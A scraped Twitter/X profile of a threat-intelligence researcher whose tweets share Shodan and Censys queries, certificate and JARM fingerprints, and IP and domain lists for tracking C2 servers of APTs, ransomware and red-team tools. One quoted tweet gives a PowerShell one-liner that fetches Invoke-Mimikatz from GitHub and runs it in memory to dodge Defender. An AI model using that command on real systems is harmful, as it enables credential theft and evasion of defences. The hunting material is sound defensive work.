Michael Koczwara

@MichalKoczwara

Followers
19,571
Following
1,678
Media
503
Statuses
7,149

Founder @Intel_Ops_io Threat Intelligence, Adversary Infrastructure Hunting, Curated TI Feed (Coming Soon)

Warsaw
Joined April 2010
@MichalKoczwara
Michael Koczwara
1 year
Pivoting from VirusTotal to Shodan and uncovering all threat actor infra (BRc4) 🎯 Let's grab this hash/badger implant (BRc4) 086d6f54b51a368d0a836ad8e24df659 Looks like the badger implant is connecting to this IP address -> 51.77.112.254 Now let's check IP with Shodan and
21
241
946
@MichalKoczwara
Michael Koczwara
2 years
Highly recommend using Shodan/filters to track/hunt adversaries' infrastructure and C2 Cobalt Strike MSF Covenant Mythic Brute Ratel C4
@shodanhq
Shodan
2 years
The Shodan Membership is on sale now for $5 until the end of Sunday, July 17th (GMT):
217
1K
2K
24
302
932
@MichalKoczwara
Michael Koczwara
2 years
Simple graph mapped to MITRE ATT @CK and TA TTPs used to breach UBER
16
219
721
@MichalKoczwara
Michael Koczwara
2 years
My last blog in 2022 💎 Adversaries Infrastructure-Ransomware Groups, APTs, and Red Teams 🎯 What you can learn from scanning adversaries' infra? Happy Hunting and see you next year! 🤘
19
176
599
@MichalKoczwara
Michael Koczwara
8 months
Sneak peek🔥 Already 42 pages on Hunting Lazarus Group🇰🇵 with practical examples/step-by-step walkthrough, and it is not finished yet. In this module, you will learn cool pivoting techniques!
27
83
543
@MichalKoczwara
Michael Koczwara
3 years
Cobalt Strike Hunting with @shodanhq Default cert: ssl.cert.serial:146473198 example 725 hits
5
197
521
@MichalKoczwara
Michael Koczwara
1 year
Cobalt Strike redirector technique used recently by Russian APT29/Nobelium ⚡️ This is a Red Team technique (T1090.002 External Proxy) to hide C2 behind a legit website. This could be very useful for Threat Hunters/Intel to set up a hypothesis/monitor
13
177
518
@MichalKoczwara
Michael Koczwara
4 years
I mapped active Cobalt Strike servers in the wild (over 450). Some of them could be legit Red Team Ops. However, the majority probably belongs to APT/Ransomware groups. cc @cyb3rops
11
162
518
@MichalKoczwara
Michael Koczwara
1 year
Hunting Havoc C2 🎯 Sometimes Threat Actors change certificates from defaults to custom ones, for example👇 165.227.106.175 <- Our hypothesis this could be Havoc C2 Looks like this IP is running with the LetsEncrypt certificate Now let's investigate this case🕵️‍♂️
12
133
508
@MichalKoczwara
Michael Koczwara
8 months
I just wonder if anyone would be interested in the course (not sure which format yet) about Hunting Malicious Infrastructure/C2. I am thinking about step-by-step practical examples of how to hunt for C2/redirections and various Threat Actors infra (Lazarus Group, APT28, APT29,
89
36
483
@MichalKoczwara
Michael Koczwara
1 year
Hunting Malicious Infrastructure using JARM and HTTP Response 🎯 I have described my process and methodology you can apply when hunting malicious infrastructure with two practical examples 👇 QBot C2 Infrastructure Brute Ratel C4 Hope you can find it
18
159
468
@MichalKoczwara
Michael Koczwara
1 year
Last night APT10, APT28, APT29, APT41, and FIN7 DM me here on Twitter and said that my tweets revealed their poor opsec practices so now they will make a few changes: Changes: APT28 is not going to use Cobalt Strike anymore and they will use Koadic C3 from today. APT29 Cobalt
12
82
416
@MichalKoczwara
Michael Koczwara
7 months
Hunting Adversary Infrastructure Training update! 🔥 The training will start from the basics and the main objective will be to help you develop your own hunting methodologies. If you are interested you can sign up here 👇 All details are in the slides.
17
90
406
@MichalKoczwara
Michael Koczwara
2 years
Threat Actors from 🐼 Brute Ratel C4, Cobalt Strike C2 and some other exploits! 👀 (and obviously bash with creds 😆)
14
62
344
@MichalKoczwara
Michael Koczwara
7 months
I am thrilled to announce the launch of my new Training Platform focused on teaching you the essentials of Hunting and Tracking Adversarial Infrastructures, including Advanced Persistent Threats (APTs), Ransomware, and Criminal Groups 🔥 Stay tuned for
6
60
334
@MichalKoczwara
Michael Koczwara
4 years
I haven't finished this yet, but this is my next step regarding Cobalt Strike Hunting/Detection research. Collection of Cobalt Strike resources for Blue Teamers/Hunters.
3
116
336
@MichalKoczwara
Michael Koczwara
1 year
A few tips on how you can use Censys to hunt malicious infrastructure - opendirs 🎯 You can use just one query with a few changes. For example, this is a good start 👇 (Directory listing for msf4) and .vendor=`Python Software Foundation`
5
106
330
@MichalKoczwara
Michael Koczwara
1 year
QakBot infra 🎯 Hunting rule 👇 http.html_hash:501510358 ssl.jarm:"21d14d00021d21d21c42d43d0000007abc6200da92c2a1b69c0a56366cbe21" Happy Hunting! 🎯
6
96
327
@MichalKoczwara
Michael Koczwara
2 months
Cybersecurity "experts" be like... APTs in 2024 will be using Artificial Intelligence to create undetectable malware, payloads, zero-day exploits, cyber weapons, and probably some cyber nuclear bombs too🥱 Meanwhile, APTs (Muddy Water 🇮🇷) in 2024 🙃
10
48
326
@MichalKoczwara
Michael Koczwara
2 years
Diamond Model 💎of Intrusion Analysis - Ransomware Group What to look for Patterns Subnets Scanning Default Certs Shodan queries/filters Opendir Understanding of C2 (CS, Posh C2, etc) Ports Ransomware TTPs Triage/VT analysis CyberChef to decode PowerShell/extract Shellcode.
10
94
317
@MichalKoczwara
Michael Koczwara
2 years
Additionally, you can also use @shodanhq for Hunting Sliver C2 Infrastructure ssl:multiplayer ssl:operators ssl:multiplayer ssl:operators ssl.jarm:"00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01"
7
84
317
@MichalKoczwara
Michael Koczwara
1 year
I think I got it finally 🤘 Hunting Havoc C2 🎯 63 hits
8
61
310
@MichalKoczwara
Michael Koczwara
9 months
Threat Intel: Pivoting using Censys 🎯 A short blog on how you can pivot from one node to another and uncover a Threat Actor cluster/infra (Muddy Water 🇮🇷).
5
79
291
@MichalKoczwara
Michael Koczwara
26 days
We recently added two new lessons to our course: - Hunting ReverseSSH🎯 - Hunting BruteRatel C4🎯 Both lessons focus on teaching students how to hunt for malicious infrastructure that is not publicly detected and how to build effective hunt rules. The IOCs from ReverseSSH and
5
35
279
@MichalKoczwara
Michael Koczwara
3 years
Mapped Conti TTPs from recent leak to @MITREattack
9
100
268
@MichalKoczwara
Michael Koczwara
3 years
Red Teams Drama 😂
11
38
248
@MichalKoczwara
Michael Koczwara
2 years
Hunting Sliver C2 Infrastructure using Censys (services.jarm.fingerprint: 00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01) and services.port=`31337`
4
77
248
@MichalKoczwara
Michael Koczwara
3 years
Apparently, one person is quite upset about my research. Well, dude if you are a red team and don't know how to hide and protect c2 then you are in the wrong job mate!😂 @cyb3rops
13
24
245
@MichalKoczwara
Michael Koczwara
2 years
Cobalt Strike C2 - opendir with full logs, keys, payloads, etc 👀 118.31.68.168
6
42
238
@MichalKoczwara
Michael Koczwara
1 year
Evilgophish infra 🎯 3.85.136.76 18.205.88.93 18.214.103.163 34.233.174.210 34.248.128.35 35.172.248.220 44.213.168.165 46.101.118.119 51.68.228.224 51.195.103.17 52.195.16.234 54.144.78.33 54.147.222.239 54.160.101.219 64.226.91.184 67.202.33.81 67.205.129.246 144.126.234.77
@bsdbandit
Charles Shirer
1 year
interesting
0
26
81
3
71
233
@MichalKoczwara
Michael Koczwara
1 year
Hunting Responder 🎯 I guess this could be handy for Threat Intel (mapping TA infra) and Threat Hunters when looking for new hypothesis or when dealing with inexperienced pentesters (hardcoded string in the old version). Responder hardcoded string/date you should look for (old
3
78
236
@MichalKoczwara
Michael Koczwara
8 months
Hunting Adversary Infrastructure Training Update. I am currently working on the syllabus for my upcoming training program, which will consist of approx 16 modules covering both theory and practical labs. In this training, I will teach you how to hunt down Ransomware Groups,
6
55
234
@MichalKoczwara
Michael Koczwara
3 years
A short article about how to manually extract C2, shellcode, and indicators of compromise from encoded Cobalt Strike PowerShell payload and perform basic analysis. Thanks for some tips! @reversinghub
7
77
232
@MichalKoczwara
Michael Koczwara
2 years
Happy Friday and Happy Hunting! 🎯 116.62.179.202
3
47
217
@MichalKoczwara
Michael Koczwara
1 year
Hunting Cobalt Strike Infra Shodan filter product: "Cobalt Strike Beacon" is great but is not capturing all Cobalt Strike C2s and one of them is CS geacon_pro profile with foren.zik certificate. So you can try below searches Shodan ssl:foren.zik
3
63
220
@MichalKoczwara
Michael Koczwara
3 years
Sometimes these ransomware Cobalt Strike gangs really crack me up like WTF? 😂🤦 18.217.142[.]56 Running cracked Cobalt Strike 4.0 on AWS with TS password as maga 😂🤦 @malwrhunterteam
9
38
217
@MichalKoczwara
Michael Koczwara
5 months
As promised we dropped the second module related to Nation State Actors DPRK Hunting Lazarus Group: APT43 Kimsuky/BlackBanshee 🇰🇵 @Intel_Ops_io
5
45
220
@MichalKoczwara
Michael Koczwara
3 years
1
40
215
@MichalKoczwara
Michael Koczwara
2 years
Ransomware Group and C2 seems to be still active A few new files added 95.213.145.99 95.213.145.101
9
38
209
@MichalKoczwara
Michael Koczwara
1 year
Hunting Havoc C2 infra 🎯 If you are interested in hunting C2s, I recommend reading the GitHub source code because all info is usually there. Havoc generates a number of certificates you should look for: ACME, Partners, Tech, Cloud, Synergy, Test, Debug + prefixes
4
44
211
@MichalKoczwara
Michael Koczwara
2 years
You can track Deimos C2s using Shodan as well 🎯 🎯 http.html_hash:-14029177 Active C2s 5.101.5.196 5.101.4.196 80.211.130.78 3.133.59.113
3
48
210
@MichalKoczwara
Michael Koczwara
9 months
APT Kimsuky/Black Banshee infra setup 💁🏻‍♂️ /cloudown.store /27.255.81.120 /27.255.81.82 /27.255.81.108 /27.255.75.154 Fake 404 Not Found page
0
62
214
@MichalKoczwara
Michael Koczwara
1 year
Recently @josh_penny and @TLP_R3D showed a few awesome examples of how to pivot SSH with Shodan to uncover Threat Actors infra and connect some dots 🕵️‍♂️ I will show you how you can do SSH pivoting with Censys and Havoc C2 as an example🤘 The goal is to uncover threat actors'
4
44
213
@MichalKoczwara
Michael Koczwara
2 years
Basic Sliver C2 Implant Analysis 🦠
6
58
213
@MichalKoczwara
Michael Koczwara
2 years
Hunting VIPER Red Team operation platform Hunting query sha1:cd40dbcdae84b1c8606f29342066547069ed5a33 Happy Hunting! 🎯
5
51
205
@MichalKoczwara
Michael Koczwara
2 years
I have updated my blog on how to look for less known adversaries' C2 Viper, ARL, and well-known Red Team tool Night Hawk C2 Hunting C2/Malicious infra 🎯 Cobalt Strike, MSF, Covenant, Deimos, Posh C2 BRC4, Mythic, Sliver, Evilginx, Gophish, IcedID
3
57
208
@MichalKoczwara
Michael Koczwara
2 years
New additions to my books collection No Shortcuts - Why States Struggle to Develop a Military Cyber Force. Offensive Cyber Operations. The Lazarus Heist. Tracers in the Dark. The Ransomware Hunting Team. If it is Smart it's Vulnerable.
10
28
206
@MichalKoczwara
Michael Koczwara
7 months
This is simply not true. I tried to log in (bruteforce?) to my account and X blocked my account only after 5 unsuccessful attempts.
@Mandiant
Mandiant (part of Google Cloud)
7 months
We have finished our investigation into last week's Mandiant X account takeover and determined it was likely a brute force password attack, limited to this single account.
87
146
539
15
22
200
@MichalKoczwara
Michael Koczwara
2 years
Other Red Team tips here if anyone is interested!
@GuhnooPlusLinux
kevin
2 years
Red Teamers, are you tired of Windows Defender deleting mimikatz.exe? Try this instead: (new-object net.webclient).downloadstring(' https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv #redteamtips
15
159
619
5
45
200
@MichalKoczwara
Michael Koczwara
1 month
This week we will release a few lessons including hunting not publicly detected Brute Ratel. Sneak peek BruteRatel🎯 /splunkapi.com /64.23.187.212
10
36
202
@MichalKoczwara
Michael Koczwara
1 year
Dream Team! Assemble! 💪 BRC4 🦡 Evilginx 😈 🎣 Cobalt Strike ⚡️ and Havoc C2 🕷 170.250.131.155
12
44
197
@MichalKoczwara
Michael Koczwara
1 year
Hunting Deimos C2 🎯 Threat Actors sometimes disable admin panels for some opsec for example, you can disable an obvious Deimos admin panel running on 7443 🤷‍♂️ However, you can still find Deimos C2 with a disabled admin panel 🤘 Just a few examples below and some hunting logic
3
52
194
@MichalKoczwara
Michael Koczwara
1 year
Hunting Sliver C2 infra 🎯 Threat Actors when deploying Sliver C2 sometimes change default ports from 31337 to other ones for example 3000, 3306, 8089, and so on so scanning only 31337 is not always enough. Censys filter below is checking Sliver default certificates also in
2
69
197
@MichalKoczwara
Michael Koczwara
1 year
My new T-shirt for the summer 🔥
10
12
195
@MichalKoczwara
Michael Koczwara
1 year
APT29/Nobelium🇷🇺 Initial Access Attack Analysis HTML (EnvyScout) dropper used by Russian APT29/Nobelium in recent campaigns ⚡️ EnvyScout uses a technique known as HTML smuggling to deliver an IMG/ISO file to the targeted systems (data block that can be
1
60
194
@MichalKoczwara
Michael Koczwara
2 years
Quick tip on how to use @Shodan to hunt for Sliver C2 ssl.jarm:3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910 "HTTP/1.1 404 Not Found" "Cache-Control: no-store, no-cache, must-revalidate" "Content-Length: 0" Example
2
56
196
@MichalKoczwara
Michael Koczwara
1 year
Hunting C2 redirections 🎯 Just with a few clicks, you can catch all of them nicely 🤝 Threat Actor infra⚡️ /weatherth.com [namecheap register fresh one 7 days old] /www.weatherjps.com 119.42.149.2 119.42.149.3 119.42.149.4 119.42.149.5 119.42.149.6 All of them are
3
64
193
@MichalKoczwara
Michael Koczwara
2 years
Hunting PoshC2 using Shodan ssl:"P18055077" Active C2s 34.235.5.141 192.18.141.199 20.210.158.139 95.213.145.101 149.28.254.42 61.220.191.84 159.65.184.179 95.213.145.99 150.136.140.174 149.167.94.36 18.135.28.6 61.220.191.84 Happy Hunting!🎯
2
60
192
@MichalKoczwara
Michael Koczwara
1 year
Hunting Mythic C2 🎯 when 7443 default port is turned off Example 🤘 /44.213.147.172 /dental-delta.com default Mythic port 7443 is turned off but threat actors still need to learn (or maybe not?) a bit about opsec xD My hunting filter in Shodan HTTP/1.1 404 Not Found Server:
7
59
189
@MichalKoczwara
Michael Koczwara
2 years
Threat Actors from China 👀 114.116.55.107:8900 Bit of everything from Cobalt Strike C2, Xray, Jindi Exploits, Struts scan, Burp, some other stuff, and obviously Stowaway.
7
36
182
@MichalKoczwara
Michael Koczwara
2 years
Cobalt Strike C2 opendir here with full of exploits, logs, keys and other stuff
@drb_ra
C2IntelFeedsBot
2 years
Cobalt Strike Server Found C2: HTTP @ 139[.]224[.]114[.]70:80 C2 Server: 139[.]224[.]114[.]70,/IE9CompatViewList[.]xml Country: China ASN: AS37963 #C2 #cobaltstrike
0
3
15
6
36
181
@MichalKoczwara
Michael Koczwara
1 year
Sliver C2 infra in one tweet 😆 263 IPs most of them run Sliver on 31337 but there are also quite a lot of unusual ones There is also overlap with Cobalt Strike, Mythic, Deimos, and so on as TA runs multiple C2 on the servers 🤷‍♂️ 1.13.174.161 3.8.115.155 3.128.135.199
7
59
181
@MichalKoczwara
Michael Koczwara
1 year
Hunting Responder and pivoting with certificates🎯 Starting point 👇 Responder running on -> 167.172.44.218 Pivoting on certs ⚡️ services.tls.certificates.leaf_data.issuer_dn="CN=PenTeraCA" Threat Actor/Red Team infra running Pentera Red Team tools and Responder🔥
2
47
180
@MichalKoczwara
Michael Koczwara
2 years
LAPSUS$ TTPs mapped to MITRE ATT&CK Framework
4
55
178
@MichalKoczwara
Michael Koczwara
6 months
In February, we'll release modules/lessons on👇 A comprehensive guide about tracking Sliver C2 🔥 Hunting Cobalt Strike redirectors ⚡️ (APT29 style) Using the Diamond Model of Intrusion Analysis 💎 Hunting APT38 and APT43 part 2 🇰🇵 Magecart 🧙‍♂️ Tips for open directories 🕵️ and
6
33
178
@MichalKoczwara
Michael Koczwara
1 year
I have scanned (again) malicious infrastructure and I was able to find out (again) an open directory with a bunch of interesting files (malicious DLLs and Sliver implants). I picked up one DLL and tried to understand how it is connected back to the C2.
2
47
176
@MichalKoczwara
Michael Koczwara
3 months
🇰🇵Looks like Lazarus (APT38) is well prepared👍 New infra and more fakes on Linkedin🥷 /fenbushi.private-meet.online /private-meet.online @Intel_Ops_io
8
42
177
@MichalKoczwara
Michael Koczwara
4 years
Added over 800 new Cobalt Strike servers to my list: Mapping adversaries' infrastructure.
3
46
174
@MichalKoczwara
Michael Koczwara
2 years
Threat Actor 🐼 Cobalt Strike C2 ⚡️ 209.209.57.185 im.wangxiaomo @gmail [.]com
5
34
173
@MichalKoczwara
Michael Koczwara
2 years
Dear Threat Actors quick reminder ⚡️ Your password doesn't matter🤷‍♂️ #cyberawarenessmonth Cobalt Strike C2 and TS creds 43.206.152.100 PwC @Hyd #500081 13.231.199.195 PwC @Hyd #500081 Also password reuse really? 😂
@drb_ra
C2IntelFeedsBot
2 years
Cobalt Strike Server Found C2: HTTP @ 43[.]206[.]152[.]100:80 C2 Server: 43[.]206[.]152[.]100,/j[.]ad Country: Japan ASN: AMAZON-02 #C2 #cobaltstrike
0
2
9
9
54
171
@MichalKoczwara
Michael Koczwara
3 months
🇰🇵Lazarus (APT38) is active again, this time impersonating @NGC_Ventures and one of its employees. Peonie Elis is a fake profile (the person from this picture is Wei Hao Partner from Sky9Capital). @Intel_Ops_io has noticed this behavior for a while. Lazarus typically starts by
4
42
164
@MichalKoczwara
Michael Koczwara
2 months
APT43/Kimsuky (Black Banshee)🇰🇵 /141.11.95.135 /67.217.60.68 /67.217.62.219 /185.141.171.31 /185.203.119.14 /note.iiiii.info /share-defence.uberlingen.com /imagedownload.ignorelist.com /signin-ym.quest /mnlp.quest /oso-usps.com /drives.youramys.com /www.uidlogin.o-r.kr
8
39
165
@MichalKoczwara
Michael Koczwara
4 months
I just had a nice conversation with the Threat Actor😅 Anyway, guys please don't fall into such lame social engineering traps. Threat Actor TTPs 👇 Social Engineering via X Impersonation of Calendly calendsly[.]cc Arranging meetings or granting access
18
22
164
@MichalKoczwara
Michael Koczwara
4 months
Next week, we're excited to add several new modules/lessons, bringing our March total to around 37 lessons. Want to access this training for free? Simply repost, like, and share in the comments how this training could benefit your career or day-to-day
35
65
153
@MichalKoczwara
Michael Koczwara
3 months
Hunting Muddy Water 🇮🇷 with @ValidinLLC DNS records host mshta.exe/command line queries in TXT records🎯 @Intel_Ops_io Come and join and we will teach you how to hunt adversaries! /mason.burton.onionmail.org and linked Muddy Water domains
2
28
152
@MichalKoczwara
Michael Koczwara
2 years
#RedTeamTips when choosing your password for Cobalt Strike Team Server make sure to also include special characters to make the password uncrackable; for example, this is a very good password! 👌 ABC @123123 @#
10
23
145
@MichalKoczwara
Michael Koczwara
9 months
Perhaps someone can help? xD
16
12
147
@MichalKoczwara
Michael Koczwara
9 months
Pivoting to find more APT Muddy Water related Infra 🇮🇷 37.120.237.204:443 37.120.237.248:443 146.70.124.102:443
@k3yp0d
Simon Kenin
9 months
MuddyWater confirmed: 1f0b9aed4b2c8d958a9b396852a62c9d a.storyblok[.]com/f/259791/x/94f59e378f/questionnaire.zip This time it is SimpleHelp 065f0871b6025b8e61f35a188bca1d5c 146.70.149[.]61:8008 @KseProso @Israel_Cyber
1
12
35
5
37
148
@MichalKoczwara
Michael Koczwara
2 years
Hunting Evilginx Infrastructure 🎯 165.22.30.136 165.227.198.201 46.101.184.179 23.99.193.156 20.172.22.144 Body Hash sha1:b18d778b4e4b6bf1fd5b2d790c941270145a6a6d Default ports 3000 or 4000
6
33
147
@MichalKoczwara
Michael Koczwara
1 year
Hunting Posh C2 🎯 You can fingerprint Threat Actors infra even when they change default certs 🤷‍♂️ Hunting rule 👇
0
46
138
@MichalKoczwara
Michael Koczwara
1 year
Let's continue with Brute Ratel C4 Hunting 🎯 Last time we started from VT/hash attributed to badger implant, we grabbed one JARM from BRc4 C2 51.77.112.254 and combined with the HTTP Response hash. Today we will pivot from another Brute Ratel C4 JARM and we will find more
2
37
139
@MichalKoczwara
Michael Koczwara
3 years
I had a look at Conti Ransomware Group Cobalt Strike C2 Infrastructure and analyzed the beacons. Short summary: All Cobalt Strike servers C2 were exposed to the internet.
4
58
141
@MichalKoczwara
Michael Koczwara
2 years
Interesting how TA is switching from Cobalt Strike to Sliver In 2021 Cobalt Strike and now in 2022 Sliver C2 23.224.135.138 23.224.135.139 23.224.135.140 23.224.135.141 23.224.135.142
3
38
133
@MichalKoczwara
Michael Koczwara
3 months
We are also hunting and tracking DPRK/Lazarus Group as well🎯 🇰🇵APT38 Bluenoroff cluster (Lazarus Group)🔥 /104.168.136.24 (0/90 VT) /104.168.151.70 (0/90 VT) /104.168.151.34 (0/90 VT) /104.168.145.52 (0/90 VT) /2607:5501:3000:155d::2 (0/VT) /appleupdate.datauploader.site (0/90
2
37
136
@MichalKoczwara
Michael Koczwara
3 months
🇰🇵Lazarus (APT38) is not giving up👍 /104.168.203.161 /ngc.regular-meeting.site /regular-meeting.site @Intel_Ops_io
3
31
128
@MichalKoczwara
Michael Koczwara
1 year
Hunting Threat Actors C2 redirections 🎯 Fake Amazon website 👀 109.205.56.203 /bucket-amazon.com -> registered with namesilo[.]com 🤷‍♂️ redirecting to legit https://signin[.]aws[.]amazon[.]com and another one 👀 45.156.25.14 /softproxyapi.com [y.polyakov @protonmail .com -
3
34
124
@MichalKoczwara
Michael Koczwara
3 months
Mom, can we have APT? No, there is APT at home. APT at home ...
16
10
125
@MichalKoczwara
Michael Koczwara
6 months
Evilginx 👹 miicrossofftonline[.]nl 🎯 operating behind CloudFlare ☁️
4
16
123
@MichalKoczwara
Michael Koczwara
1 year
This is a great finding from @drb_ra from this one node 37.220.31.54 you can pivot with Censys and Shodan and uncover Bianlian C2 Infrastructure 🔥
@drb_ra
C2IntelFeedsBot
1 year
(Unverified) Bianlian Go Trojan Found C2: 37[.]220[.]31[.]54:443 Country: United Kingdom (AS20860) ASN: IOMART-AS #c2 #Bianlian #unverified
0
1
6
0
31
122
@MichalKoczwara
Michael Koczwara
5 months
Update on Adversary Infrastructure Hunting Course. We've finished the first phase of our course content, covering 28 modules on tracking APTs, criminal groups, and C2 frameworks. The feedback from our students has been positive and helpful. Our students come from a wide range of
3
12
123
@MichalKoczwara
Michael Koczwara
2 years
Happy Saturday! 🎯 Cobalt Strike C2 ⚡️ 120.46.177.219 🐼 threat actor (cheniu) logs, keys, tools, agent tesla, passwords, etc.
3
19
117
@MichalKoczwara
Michael Koczwara
2 years
Hey, how many Cobalt Strike do you need? ⚡️ 175.178.73.224 -CobaltStrike -cobaltstrike4.0 -cobaltstrike45+agent -CS4.4 -K8_CS_4.4_20211109
6
21
118
@MichalKoczwara
Michael Koczwara
2 months
Introducing a new module - Hunting Cobalt Strike with @ValidinLLC Students will learn how to use Validin to hunt malicious infrastructure. In the first lesson, we will examine several Red Team Cobalt Strike examples, focusing on how to hunt them and identifying common
2
19
115
@MichalKoczwara
Michael Koczwara
2 years
Current situation! And read the logs so you will understand the difference between the victims and the targets!
3
19
113
@MichalKoczwara
Michael Koczwara
3 months
Thanks everyone for playing 🙏 Here is the Lazarus one 🥷🇰🇵
2
14
112